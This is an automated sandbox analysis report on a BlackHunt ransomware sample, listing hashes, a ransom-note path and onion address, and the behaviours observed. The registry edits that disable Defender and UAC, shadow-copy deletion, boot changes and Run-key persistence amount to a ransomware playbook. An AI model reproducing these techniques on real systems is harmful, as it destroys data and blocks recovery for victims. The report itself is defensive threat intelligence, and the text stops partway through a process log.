Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
151s -
max time network
46s -
platform
windows7_x64 -
resource
win7-20231215-en -
resource tags
arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system -
submitted
19/01/2024, 00:57
Static task
static1
Behavioral task
behavioral1
Sample
cf746b82ce6f62483e7b9080bcd329c112ebf38b5ecd02167e6f3af43e0f33d7.exe
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
cf746b82ce6f62483e7b9080bcd329c112ebf38b5ecd02167e6f3af43e0f33d7.exe
Resource
win10v2004-20231215-en
General
-
Target
cf746b82ce6f62483e7b9080bcd329c112ebf38b5ecd02167e6f3af43e0f33d7.exe
-
Size
707KB
-
MD5
5d53db9aa7f297cb21ff6018979aaa71
-
SHA1
f8f996591327a6cd0439455a1ee6c077b1355ef1
-
SHA256
cf746b82ce6f62483e7b9080bcd329c112ebf38b5ecd02167e6f3af43e0f33d7
-
SHA512
62200d005f5f65bd12a47ce3d3b6a5ffc7590c1c41efd3e3e8099bb0356b66fc778522626765350dbf9d9ea9e6079aaef2754578e8f04308f3410b4e577d1dea
-
SSDEEP
6144:wcmwdMZ0aq9arLKkdMqJ+VYg/5ICAAQs+d5zSTamgEoOFzxLza1d81vnh:6uaTmkZJ+naie5OTamgEoKxLWgxh
Malware Config
Extracted
C:\ProgramData\#BlackHunt_ReadMe.hta
http-equiv="x-ua-compatible"
http://sdjf982lkjsdvcjlksaf2kjhlksvvnktyoiasuc92lf.onion
Signatures
-
Deletes NTFS Change Journal 2 TTPs 1 IoCs
The USN change journal is a persistent log of all changes made to local files used by Windows Server systems.
pid Process 1272 fsutil.exe -
description ioc Process Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" cf746b82ce6f62483e7b9080bcd329c112ebf38b5ecd02167e6f3af43e0f33d7.exe -
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
pid Process 1692 bcdedit.exe 2636 bcdedit.exe -
Renames multiple (2683) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
pid Process 2704 wbadmin.exe -
Disables Task Manager via registry modification
-
Disables use of System Restore points 1 TTPs
-
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{2C5F9FCC-F266-43F6-BFD7-838DAE269E11} = "C:\\ProgramData\\#BlackHunt_ReadMe.hta" reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" cf746b82ce6f62483e7b9080bcd329c112ebf38b5ecd02167e6f3af43e0f33d7.exe -
Enumerates connected drives 3 TTPs 25 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\E: cf746b82ce6f62483e7b9080bcd329c112ebf38b5ecd02167e6f3af43e0f33d7.exe File opened (read-only) \??\T: cf746b82ce6f62483e7b9080bcd329c112ebf38b5ecd02167e6f3af43e0f33d7.exe File opened (read-only) \??\U: cf746b82ce6f62483e7b9080bcd329c112ebf38b5ecd02167e6f3af43e0f33d7.exe File opened (read-only) \??\I: cf746b82ce6f62483e7b9080bcd329c112ebf38b5ecd02167e6f3af43e0f33d7.exe File opened (read-only) \??\X: cf746b82ce6f62483e7b9080bcd329c112ebf38b5ecd02167e6f3af43e0f33d7.exe File opened (read-only) \??\A: cf746b82ce6f62483e7b9080bcd329c112ebf38b5ecd02167e6f3af43e0f33d7.exe File opened (read-only) \??\S: cf746b82ce6f62483e7b9080bcd329c112ebf38b5ecd02167e6f3af43e0f33d7.exe File opened (read-only) \??\H: cf746b82ce6f62483e7b9080bcd329c112ebf38b5ecd02167e6f3af43e0f33d7.exe File opened (read-only) \??\Q: cf746b82ce6f62483e7b9080bcd329c112ebf38b5ecd02167e6f3af43e0f33d7.exe File opened (read-only) \??\R: cf746b82ce6f62483e7b9080bcd329c112ebf38b5ecd02167e6f3af43e0f33d7.exe File opened (read-only) \??\Z: cf746b82ce6f62483e7b9080bcd329c112ebf38b5ecd02167e6f3af43e0f33d7.exe File opened (read-only) \??\V: cf746b82ce6f62483e7b9080bcd329c112ebf38b5ecd02167e6f3af43e0f33d7.exe File opened (read-only) \??\N: cf746b82ce6f62483e7b9080bcd329c112ebf38b5ecd02167e6f3af43e0f33d7.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\Y: cf746b82ce6f62483e7b9080bcd329c112ebf38b5ecd02167e6f3af43e0f33d7.exe File opened (read-only) \??\B: cf746b82ce6f62483e7b9080bcd329c112ebf38b5ecd02167e6f3af43e0f33d7.exe File opened (read-only) \??\W: cf746b82ce6f62483e7b9080bcd329c112ebf38b5ecd02167e6f3af43e0f33d7.exe File opened (read-only) \??\O: cf746b82ce6f62483e7b9080bcd329c112ebf38b5ecd02167e6f3af43e0f33d7.exe File opened (read-only) \??\P: cf746b82ce6f62483e7b9080bcd329c112ebf38b5ecd02167e6f3af43e0f33d7.exe File opened (read-only) \??\G: cf746b82ce6f62483e7b9080bcd329c112ebf38b5ecd02167e6f3af43e0f33d7.exe File opened (read-only) \??\L: cf746b82ce6f62483e7b9080bcd329c112ebf38b5ecd02167e6f3af43e0f33d7.exe File opened (read-only) \??\K: cf746b82ce6f62483e7b9080bcd329c112ebf38b5ecd02167e6f3af43e0f33d7.exe File opened (read-only) \??\M: cf746b82ce6f62483e7b9080bcd329c112ebf38b5ecd02167e6f3af43e0f33d7.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\J: cf746b82ce6f62483e7b9080bcd329c112ebf38b5ecd02167e6f3af43e0f33d7.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 2 ip-api.com -
Drops file in Program Files directory 64 IoCs
description ioc Process File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\jfr\profile.jfc cf746b82ce6f62483e7b9080bcd329c112ebf38b5ecd02167e6f3af43e0f33d7.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.rcp_4.4.0.v20141007-2301\META-INF\#BlackHunt_ReadMe.hta cf746b82ce6f62483e7b9080bcd329c112ebf38b5ecd02167e6f3af43e0f33d7.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.browser.jdp.zh_CN_5.5.0.165303.jar cf746b82ce6f62483e7b9080bcd329c112ebf38b5ecd02167e6f3af43e0f33d7.exe File created C:\Program Files\VideoLAN\VLC\locale\sl\LC_MESSAGES\#BlackHunt_ReadMe.hta cf746b82ce6f62483e7b9080bcd329c112ebf38b5ecd02167e6f3af43e0f33d7.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\ps\LC_MESSAGES\vlc.mo cf746b82ce6f62483e7b9080bcd329c112ebf38b5ecd02167e6f3af43e0f33d7.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\zh_TW\LC_MESSAGES\vlc.mo cf746b82ce6f62483e7b9080bcd329c112ebf38b5ecd02167e6f3af43e0f33d7.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.feature_3.9.1.v20140827-1444\#BlackHunt_Private.key cf746b82ce6f62483e7b9080bcd329c112ebf38b5ecd02167e6f3af43e0f33d7.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\gtkTSFrame.png cf746b82ce6f62483e7b9080bcd329c112ebf38b5ecd02167e6f3af43e0f33d7.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.w3c.dom.svg_1.1.0.v201011041433.jar cf746b82ce6f62483e7b9080bcd329c112ebf38b5ecd02167e6f3af43e0f33d7.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Zurich cf746b82ce6f62483e7b9080bcd329c112ebf38b5ecd02167e6f3af43e0f33d7.exe File created C:\Program Files\VideoLAN\VLC\locale\pt_BR\#BlackHunt_ReadMe.txt cf746b82ce6f62483e7b9080bcd329c112ebf38b5ecd02167e6f3af43e0f33d7.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\GMT+12 cf746b82ce6f62483e7b9080bcd329c112ebf38b5ecd02167e6f3af43e0f33d7.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.equinox.p2.rcp.feature_1.2.0.v20140523-0116\META-INF\#BlackHunt_ReadMe.hta cf746b82ce6f62483e7b9080bcd329c112ebf38b5ecd02167e6f3af43e0f33d7.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-openide-dialogs.jar cf746b82ce6f62483e7b9080bcd329c112ebf38b5ecd02167e6f3af43e0f33d7.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\ca\LC_MESSAGES\vlc.mo cf746b82ce6f62483e7b9080bcd329c112ebf38b5ecd02167e6f3af43e0f33d7.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Legal\ENU\eula.ini cf746b82ce6f62483e7b9080bcd329c112ebf38b5ecd02167e6f3af43e0f33d7.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Travel\TravelIntroToMain_PAL.wmv cf746b82ce6f62483e7b9080bcd329c112ebf38b5ecd02167e6f3af43e0f33d7.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.core.databinding.beans_1.2.200.v20140214-0004.jar cf746b82ce6f62483e7b9080bcd329c112ebf38b5ecd02167e6f3af43e0f33d7.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.css.swt.nl_zh_4.4.0.v20140623020002.jar cf746b82ce6f62483e7b9080bcd329c112ebf38b5ecd02167e6f3af43e0f33d7.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\lib\deployed\#BlackHunt_ReadMe.hta cf746b82ce6f62483e7b9080bcd329c112ebf38b5ecd02167e6f3af43e0f33d7.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Pacific\Galapagos cf746b82ce6f62483e7b9080bcd329c112ebf38b5ecd02167e6f3af43e0f33d7.exe File opened for modification C:\Program Files\7-Zip\Lang\mng.txt cf746b82ce6f62483e7b9080bcd329c112ebf38b5ecd02167e6f3af43e0f33d7.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.feature_3.9.1.v20140827-1444\META-INF\#BlackHunt_ReadMe.txt cf746b82ce6f62483e7b9080bcd329c112ebf38b5ecd02167e6f3af43e0f33d7.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.core.databinding.observable_1.4.1.v20140210-1835.jar cf746b82ce6f62483e7b9080bcd329c112ebf38b5ecd02167e6f3af43e0f33d7.exe File created C:\Program Files\VideoLAN\VLC\locale\fi\#BlackHunt_ReadMe.hta cf746b82ce6f62483e7b9080bcd329c112ebf38b5ecd02167e6f3af43e0f33d7.exe File created C:\Program Files\VideoLAN\VLC\locale\km\#BlackHunt_ReadMe.hta cf746b82ce6f62483e7b9080bcd329c112ebf38b5ecd02167e6f3af43e0f33d7.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.ssl.feature_1.0.0.v20140827-1444\#BlackHunt_ReadMe.hta cf746b82ce6f62483e7b9080bcd329c112ebf38b5ecd02167e6f3af43e0f33d7.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.touchpoint.eclipse.nl_ja_4.4.0.v20140623020002.jar cf746b82ce6f62483e7b9080bcd329c112ebf38b5ecd02167e6f3af43e0f33d7.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Argentina\Tucuman cf746b82ce6f62483e7b9080bcd329c112ebf38b5ecd02167e6f3af43e0f33d7.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Sports\SportsScenesBackground_PAL.wmv cf746b82ce6f62483e7b9080bcd329c112ebf38b5ecd02167e6f3af43e0f33d7.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\html\#BlackHunt_ReadMe.hta cf746b82ce6f62483e7b9080bcd329c112ebf38b5ecd02167e6f3af43e0f33d7.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Argentina\Mendoza cf746b82ce6f62483e7b9080bcd329c112ebf38b5ecd02167e6f3af43e0f33d7.exe File created C:\Program Files\VideoLAN\VLC\locale\ja\LC_MESSAGES\#BlackHunt_ReadMe.txt cf746b82ce6f62483e7b9080bcd329c112ebf38b5ecd02167e6f3af43e0f33d7.exe File created C:\Program Files (x86)\Google\Update\Offline\#BlackHunt_ReadMe.hta cf746b82ce6f62483e7b9080bcd329c112ebf38b5ecd02167e6f3af43e0f33d7.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-application-views.xml cf746b82ce6f62483e7b9080bcd329c112ebf38b5ecd02167e6f3af43e0f33d7.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Boa_Vista cf746b82ce6f62483e7b9080bcd329c112ebf38b5ecd02167e6f3af43e0f33d7.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Uzhgorod cf746b82ce6f62483e7b9080bcd329c112ebf38b5ecd02167e6f3af43e0f33d7.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.feature_1.1.0.v20140827-1444\META-INF\eclipse.inf cf746b82ce6f62483e7b9080bcd329c112ebf38b5ecd02167e6f3af43e0f33d7.exe File created C:\Program Files\Java\jre7\lib\zi\America\North_Dakota\#BlackHunt_Private.key cf746b82ce6f62483e7b9080bcd329c112ebf38b5ecd02167e6f3af43e0f33d7.exe File created C:\Program Files\VideoLAN\VLC\locale\tr\LC_MESSAGES\#BlackHunt_Private.key cf746b82ce6f62483e7b9080bcd329c112ebf38b5ecd02167e6f3af43e0f33d7.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\#BlackHunt_ReadMe.txt cf746b82ce6f62483e7b9080bcd329c112ebf38b5ecd02167e6f3af43e0f33d7.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins3d\drvDX9.x3d cf746b82ce6f62483e7b9080bcd329c112ebf38b5ecd02167e6f3af43e0f33d7.exe File opened for modification C:\Program Files\7-Zip\License.txt cf746b82ce6f62483e7b9080bcd329c112ebf38b5ecd02167e6f3af43e0f33d7.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\LayeredTitles\203x8subpicture.png cf746b82ce6f62483e7b9080bcd329c112ebf38b5ecd02167e6f3af43e0f33d7.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\images\cursors\win32_MoveNoDrop32x32.gif cf746b82ce6f62483e7b9080bcd329c112ebf38b5ecd02167e6f3af43e0f33d7.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\management\jmxremote.password.template cf746b82ce6f62483e7b9080bcd329c112ebf38b5ecd02167e6f3af43e0f33d7.exe File created C:\Program Files\VideoLAN\VLC\locale\gd\LC_MESSAGES\#BlackHunt_ReadMe.hta cf746b82ce6f62483e7b9080bcd329c112ebf38b5ecd02167e6f3af43e0f33d7.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\mobile_browse.html cf746b82ce6f62483e7b9080bcd329c112ebf38b5ecd02167e6f3af43e0f33d7.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Push\push_title.png cf746b82ce6f62483e7b9080bcd329c112ebf38b5ecd02167e6f3af43e0f33d7.exe File created C:\Program Files\VideoLAN\VLC\locale\br\#BlackHunt_Private.key cf746b82ce6f62483e7b9080bcd329c112ebf38b5ecd02167e6f3af43e0f33d7.exe File created C:\Program Files\VideoLAN\VLC\locale\kn\#BlackHunt_ReadMe.hta cf746b82ce6f62483e7b9080bcd329c112ebf38b5ecd02167e6f3af43e0f33d7.exe File created C:\Program Files\VideoLAN\VLC\locale\nb\#BlackHunt_ReadMe.txt cf746b82ce6f62483e7b9080bcd329c112ebf38b5ecd02167e6f3af43e0f33d7.exe File created C:\Program Files\VideoLAN\VLC\locale\ne\LC_MESSAGES\#BlackHunt_Private.key cf746b82ce6f62483e7b9080bcd329c112ebf38b5ecd02167e6f3af43e0f33d7.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Martinique cf746b82ce6f62483e7b9080bcd329c112ebf38b5ecd02167e6f3af43e0f33d7.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Multimedia\MPP\QuickTime.mpp cf746b82ce6f62483e7b9080bcd329c112ebf38b5ecd02167e6f3af43e0f33d7.exe File created C:\Program Files\VideoLAN\VLC\plugins\d3d9\#BlackHunt_ReadMe.hta cf746b82ce6f62483e7b9080bcd329c112ebf38b5ecd02167e6f3af43e0f33d7.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Multimedia\#BlackHunt_ReadMe.hta cf746b82ce6f62483e7b9080bcd329c112ebf38b5ecd02167e6f3af43e0f33d7.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\cryptocme2.sig cf746b82ce6f62483e7b9080bcd329c112ebf38b5ecd02167e6f3af43e0f33d7.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-swing-outline_ja.jar cf746b82ce6f62483e7b9080bcd329c112ebf38b5ecd02167e6f3af43e0f33d7.exe File created C:\Program Files\Java\jre7\lib\cmm\#BlackHunt_ReadMe.hta cf746b82ce6f62483e7b9080bcd329c112ebf38b5ecd02167e6f3af43e0f33d7.exe File created C:\Program Files\VideoLAN\VLC\locale\gu\#BlackHunt_Private.key cf746b82ce6f62483e7b9080bcd329c112ebf38b5ecd02167e6f3af43e0f33d7.exe File created C:\Program Files\VideoLAN\VLC\locale\ko\#BlackHunt_Private.key cf746b82ce6f62483e7b9080bcd329c112ebf38b5ecd02167e6f3af43e0f33d7.exe File created C:\Program Files\VideoLAN\VLC\lua\meta\reader\#BlackHunt_Private.key cf746b82ce6f62483e7b9080bcd329c112ebf38b5ecd02167e6f3af43e0f33d7.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\requests\README.txt cf746b82ce6f62483e7b9080bcd329c112ebf38b5ecd02167e6f3af43e0f33d7.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2404 schtasks.exe -
Interacts with shadow copies 2 TTPs 5 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 3000 vssadmin.exe 1348 vssadmin.exe 2140 vssadmin.exe 1792 vssadmin.exe 2252 vssadmin.exe -
Modifies registry class 10 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\ reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2 vssadmin.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\ reg.exe Key created \REGISTRY\MACHINE\Software\Classes\Hunt2\DefaultIcon vssadmin.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\DefaultIcon vssadmin.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" vssadmin.exe Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2\DefaultIcon reg.exe Key created \REGISTRY\MACHINE\Software\Classes\Hunt2 reg.exe Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2 reg.exe -
Suspicious use of AdjustPrivilegeToken 13 IoCs
description pid Process Token: SeDebugPrivilege 2380 cf746b82ce6f62483e7b9080bcd329c112ebf38b5ecd02167e6f3af43e0f33d7.exe Token: SeRestorePrivilege 2380 cf746b82ce6f62483e7b9080bcd329c112ebf38b5ecd02167e6f3af43e0f33d7.exe Token: SeBackupPrivilege 2380 cf746b82ce6f62483e7b9080bcd329c112ebf38b5ecd02167e6f3af43e0f33d7.exe Token: SeTakeOwnershipPrivilege 2380 cf746b82ce6f62483e7b9080bcd329c112ebf38b5ecd02167e6f3af43e0f33d7.exe Token: SeAuditPrivilege 2380 cf746b82ce6f62483e7b9080bcd329c112ebf38b5ecd02167e6f3af43e0f33d7.exe Token: SeSecurityPrivilege 2380 cf746b82ce6f62483e7b9080bcd329c112ebf38b5ecd02167e6f3af43e0f33d7.exe Token: SeIncBasePriorityPrivilege 2380 cf746b82ce6f62483e7b9080bcd329c112ebf38b5ecd02167e6f3af43e0f33d7.exe Token: SeBackupPrivilege 2688 vssvc.exe Token: SeRestorePrivilege 2688 vssvc.exe Token: SeAuditPrivilege 2688 vssvc.exe Token: SeBackupPrivilege 3012 wbengine.exe Token: SeRestorePrivilege 3012 wbengine.exe Token: SeSecurityPrivilege 3012 wbengine.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2380 wrote to memory of 2796 2380 cf746b82ce6f62483e7b9080bcd329c112ebf38b5ecd02167e6f3af43e0f33d7.exe 31 PID 2380 wrote to memory of 2796 2380 cf746b82ce6f62483e7b9080bcd329c112ebf38b5ecd02167e6f3af43e0f33d7.exe 31 PID 2380 wrote to memory of 2796 2380 cf746b82ce6f62483e7b9080bcd329c112ebf38b5ecd02167e6f3af43e0f33d7.exe 31 PID 2380 wrote to memory of 2796 2380 cf746b82ce6f62483e7b9080bcd329c112ebf38b5ecd02167e6f3af43e0f33d7.exe 31 PID 2380 wrote to memory of 3040 2380 cf746b82ce6f62483e7b9080bcd329c112ebf38b5ecd02167e6f3af43e0f33d7.exe 32 PID 2380 wrote to memory of 3040 2380 cf746b82ce6f62483e7b9080bcd329c112ebf38b5ecd02167e6f3af43e0f33d7.exe 32 PID 2380 wrote to memory of 3040 2380 cf746b82ce6f62483e7b9080bcd329c112ebf38b5ecd02167e6f3af43e0f33d7.exe 32 PID 2380 wrote to memory of 3040 2380 cf746b82ce6f62483e7b9080bcd329c112ebf38b5ecd02167e6f3af43e0f33d7.exe 32 PID 2380 wrote to memory of 2216 2380 cf746b82ce6f62483e7b9080bcd329c112ebf38b5ecd02167e6f3af43e0f33d7.exe 34 PID 2380 wrote to memory of 2216 2380 cf746b82ce6f62483e7b9080bcd329c112ebf38b5ecd02167e6f3af43e0f33d7.exe 34 PID 2380 wrote to memory of 2216 2380 cf746b82ce6f62483e7b9080bcd329c112ebf38b5ecd02167e6f3af43e0f33d7.exe 34 PID 2380 wrote to memory of 2216 2380 cf746b82ce6f62483e7b9080bcd329c112ebf38b5ecd02167e6f3af43e0f33d7.exe 34 PID 2380 wrote to memory of 2552 2380 cf746b82ce6f62483e7b9080bcd329c112ebf38b5ecd02167e6f3af43e0f33d7.exe 35 PID 2380 wrote to memory of 2552 2380 cf746b82ce6f62483e7b9080bcd329c112ebf38b5ecd02167e6f3af43e0f33d7.exe 35 PID 2380 wrote to memory of 2552 2380 cf746b82ce6f62483e7b9080bcd329c112ebf38b5ecd02167e6f3af43e0f33d7.exe 35 PID 2380 wrote to memory of 2552 2380 cf746b82ce6f62483e7b9080bcd329c112ebf38b5ecd02167e6f3af43e0f33d7.exe 35 PID 2380 wrote to memory of 2544 2380 cf746b82ce6f62483e7b9080bcd329c112ebf38b5ecd02167e6f3af43e0f33d7.exe 37 PID 2380 wrote to memory of 2544 2380 cf746b82ce6f62483e7b9080bcd329c112ebf38b5ecd02167e6f3af43e0f33d7.exe 37 PID 2380 wrote to memory of 2544 2380 cf746b82ce6f62483e7b9080bcd329c112ebf38b5ecd02167e6f3af43e0f33d7.exe 37 PID 2380 wrote to memory of 2544 2380 cf746b82ce6f62483e7b9080bcd329c112ebf38b5ecd02167e6f3af43e0f33d7.exe 37 PID 2380 wrote to memory of 2236 2380 cf746b82ce6f62483e7b9080bcd329c112ebf38b5ecd02167e6f3af43e0f33d7.exe 39 PID 2380 wrote to memory of 2236 2380 cf746b82ce6f62483e7b9080bcd329c112ebf38b5ecd02167e6f3af43e0f33d7.exe 39 PID 2380 wrote to memory of 2236 2380 cf746b82ce6f62483e7b9080bcd329c112ebf38b5ecd02167e6f3af43e0f33d7.exe 39 PID 2380 wrote to memory of 2236 2380 cf746b82ce6f62483e7b9080bcd329c112ebf38b5ecd02167e6f3af43e0f33d7.exe 39 PID 2380 wrote to memory of 2564 2380 cf746b82ce6f62483e7b9080bcd329c112ebf38b5ecd02167e6f3af43e0f33d7.exe 43 PID 2380 wrote to memory of 2564 2380 cf746b82ce6f62483e7b9080bcd329c112ebf38b5ecd02167e6f3af43e0f33d7.exe 43 PID 2380 wrote to memory of 2564 2380 cf746b82ce6f62483e7b9080bcd329c112ebf38b5ecd02167e6f3af43e0f33d7.exe 43 PID 2380 wrote to memory of 2564 2380 cf746b82ce6f62483e7b9080bcd329c112ebf38b5ecd02167e6f3af43e0f33d7.exe 43 PID 2380 wrote to memory of 2520 2380 cf746b82ce6f62483e7b9080bcd329c112ebf38b5ecd02167e6f3af43e0f33d7.exe 45 PID 2380 wrote to memory of 2520 2380 cf746b82ce6f62483e7b9080bcd329c112ebf38b5ecd02167e6f3af43e0f33d7.exe 45 PID 2380 wrote to memory of 2520 2380 cf746b82ce6f62483e7b9080bcd329c112ebf38b5ecd02167e6f3af43e0f33d7.exe 45 PID 2380 wrote to memory of 2520 2380 cf746b82ce6f62483e7b9080bcd329c112ebf38b5ecd02167e6f3af43e0f33d7.exe 45 PID 2380 wrote to memory of 2536 2380 cf746b82ce6f62483e7b9080bcd329c112ebf38b5ecd02167e6f3af43e0f33d7.exe 47 PID 2380 wrote to memory of 2536 2380 cf746b82ce6f62483e7b9080bcd329c112ebf38b5ecd02167e6f3af43e0f33d7.exe 47 PID 2380 wrote to memory of 2536 2380 cf746b82ce6f62483e7b9080bcd329c112ebf38b5ecd02167e6f3af43e0f33d7.exe 47 PID 2380 wrote to memory of 2536 2380 cf746b82ce6f62483e7b9080bcd329c112ebf38b5ecd02167e6f3af43e0f33d7.exe 47 PID 2380 wrote to memory of 2584 2380 cf746b82ce6f62483e7b9080bcd329c112ebf38b5ecd02167e6f3af43e0f33d7.exe 49 PID 2380 wrote to memory of 2584 2380 cf746b82ce6f62483e7b9080bcd329c112ebf38b5ecd02167e6f3af43e0f33d7.exe 49 PID 2380 wrote to memory of 2584 2380 cf746b82ce6f62483e7b9080bcd329c112ebf38b5ecd02167e6f3af43e0f33d7.exe 49 PID 2380 wrote to memory of 2584 2380 cf746b82ce6f62483e7b9080bcd329c112ebf38b5ecd02167e6f3af43e0f33d7.exe 49 PID 2380 wrote to memory of 1992 2380 cf746b82ce6f62483e7b9080bcd329c112ebf38b5ecd02167e6f3af43e0f33d7.exe 52 PID 2380 wrote to memory of 1992 2380 cf746b82ce6f62483e7b9080bcd329c112ebf38b5ecd02167e6f3af43e0f33d7.exe 52 PID 2380 wrote to memory of 1992 2380 cf746b82ce6f62483e7b9080bcd329c112ebf38b5ecd02167e6f3af43e0f33d7.exe 52 PID 2380 wrote to memory of 1992 2380 cf746b82ce6f62483e7b9080bcd329c112ebf38b5ecd02167e6f3af43e0f33d7.exe 52 PID 2796 wrote to memory of 2240 2796 cmd.exe 53 PID 2796 wrote to memory of 2240 2796 cmd.exe 53 PID 2796 wrote to memory of 2240 2796 cmd.exe 53 PID 2380 wrote to memory of 2288 2380 cf746b82ce6f62483e7b9080bcd329c112ebf38b5ecd02167e6f3af43e0f33d7.exe 54 PID 2380 wrote to memory of 2288 2380 cf746b82ce6f62483e7b9080bcd329c112ebf38b5ecd02167e6f3af43e0f33d7.exe 54 PID 2380 wrote to memory of 2288 2380 cf746b82ce6f62483e7b9080bcd329c112ebf38b5ecd02167e6f3af43e0f33d7.exe 54 PID 2380 wrote to memory of 2288 2380 cf746b82ce6f62483e7b9080bcd329c112ebf38b5ecd02167e6f3af43e0f33d7.exe 54 PID 2380 wrote to memory of 2036 2380 cf746b82ce6f62483e7b9080bcd329c112ebf38b5ecd02167e6f3af43e0f33d7.exe 55 PID 2380 wrote to memory of 2036 2380 cf746b82ce6f62483e7b9080bcd329c112ebf38b5ecd02167e6f3af43e0f33d7.exe 55 PID 2380 wrote to memory of 2036 2380 cf746b82ce6f62483e7b9080bcd329c112ebf38b5ecd02167e6f3af43e0f33d7.exe 55 PID 2380 wrote to memory of 2036 2380 cf746b82ce6f62483e7b9080bcd329c112ebf38b5ecd02167e6f3af43e0f33d7.exe 55 PID 2380 wrote to memory of 2108 2380 cf746b82ce6f62483e7b9080bcd329c112ebf38b5ecd02167e6f3af43e0f33d7.exe 57 PID 2380 wrote to memory of 2108 2380 